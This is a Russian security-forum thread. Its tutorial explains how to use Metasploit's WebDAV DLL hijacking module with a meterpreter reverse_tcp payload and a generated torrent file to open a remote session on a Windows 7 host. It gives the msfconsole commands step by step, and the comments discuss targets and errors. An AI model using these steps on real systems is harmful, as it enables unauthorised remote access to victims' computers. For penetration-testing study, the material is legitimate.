• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Доступ к удаленному ПК с помощью torrent-файла

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 347
BIT
0
Всем привет! В этой теме я хочу рассмотреть способ получения активной сессии meterpreter с помощью выполнения вредоносного кода содержащегося в файле, типа torrent.

upload_2017-4-18_21-43-54.png


С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, я буду использовать десктоп с установленной Windows 7.

upload_2017-4-18_21-44-11.png


Итак, запустив Metasploit, вводим следующее:

> use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)

> msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)

> set lhost 192.168.0.104 (Определим адрес атакующего хоста)

> set extensions torrent (Выберем тип расширения файла)

> exploit (Запустим работу фреймворка)

upload_2017-4-18_21-44-41.png


Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.

upload_2017-4-18_21-44-57.png


Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка:

upload_2017-4-18_21-45-13.png


В консоли атакующего хоста видим сигнализационные сообщения:

upload_2017-4-18_21-45-31.png


Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл:

upload_2017-4-18_21-45-46.png


После его запуска, откроется активная сессия meterpreter:

upload_2017-4-18_21-46-0.png


Проверим ее:

upload_2017-4-18_21-46-16.png


В опциях эксплойта, можно изменить директорию и название полезной нагрузки:

upload_2017-4-18_21-46-30.png


При попытке применить эксплоит к Windows 8.1:

upload_2017-4-18_21-46-47.png


Так же реагирует и Windows 10, полагаю дело в обновлении, которое закрыло критические уязвимости в Windows.

На этом пожалуй, все, спасибо за внимание.
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Интересно , жаль только 7ки подаются так как щас везде 8-10 стоят

Везде? Я бы так не утверждал. На крупных предприятиях ( компаниях ) доля 7 более 60% (к примеру стройматериалы зеленого цвета сеть магазов из франции сидят на 7, сеть продуктов с рыжим цветом - 7, красный ретейл федерал на букву М - тоже 7 ка, нии по авиа теме - 7 ка стоит), так что она есть и будет жить еще лет 5, ХР еще тркдятся кое где, причем не в пыльной бьиблиотеке Ухрюпинска.. 8-10 ка в соновном у домашних, так как львиная доля 10 пришла с покупкой нового железа.

ТС Статья добрая, как всегда к месту. Плюсик и респект )
 
C

(((_CYBORG_)))

Не ну статья то что надо! Вообще как попал сюда заметил много чего полезного ! А самое что приятное что тут автор учит пользователя! Что есть хорошо!
 
  • Нравится
Реакции: Breed и Vander

TrevorReznik

Green Team
27.12.2016
14
21
BIT
0
на предприятиях в основном 7-ки т.к. на старые принтеры и МФУ не всегда есть дрова на 10...
 
  • Нравится
Реакции: Vander
I

Inject0r

у меня и на 7-ке ошибка неверной кодировки выдает utorrent
 
S

Sokratik

Тоже попробовал на windows 7 sp1 utorrent. Та же ошибка неверной кодировки. Есть фиксы?
 
Е

Евгений967

у меня и на 7-ке ошибка неверной кодировки выдает utorrent та же беда
 

Breed

Заблокирован
16.05.2017
194
238
BIT
0
было бы неплохо модифицировать реальный торрент-файл, а не пустышку создавать, не особо практично, хотя интересно
Если цель здешний публикаций - это увеличение числа "доморощенных кулцакеров", ищущих продукт "установил-нажал кнопку-получил результат", то можно и согласиться с такой позицией. Тогда, к примеру, и ЕГЭ - отличный способ проверки знаний!
А вот если приучать мыслить более глобально, то автор предоставляет громадное поле деятельности и возможность пошевелить серым веществом, а заодно - возможность проявить инициативу. Дано направление куда копать, а реализацию можно сочинять самому.
=================
Я здесь вообще-то недавно и, памятуя о том, что со своим уставом в чужой монастырь не ходят, особо не выпячиваюсь. Но полагаю, что все непонятки при собственной реализации принципа внедрения-атаки можно решить либо обращением в общедоступной ветке (то бишь здесь), либо в личке к автору, если придумали нечто реально стоящее.
Нужно приучать людей ДУМАТЬ. Или я неправ?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!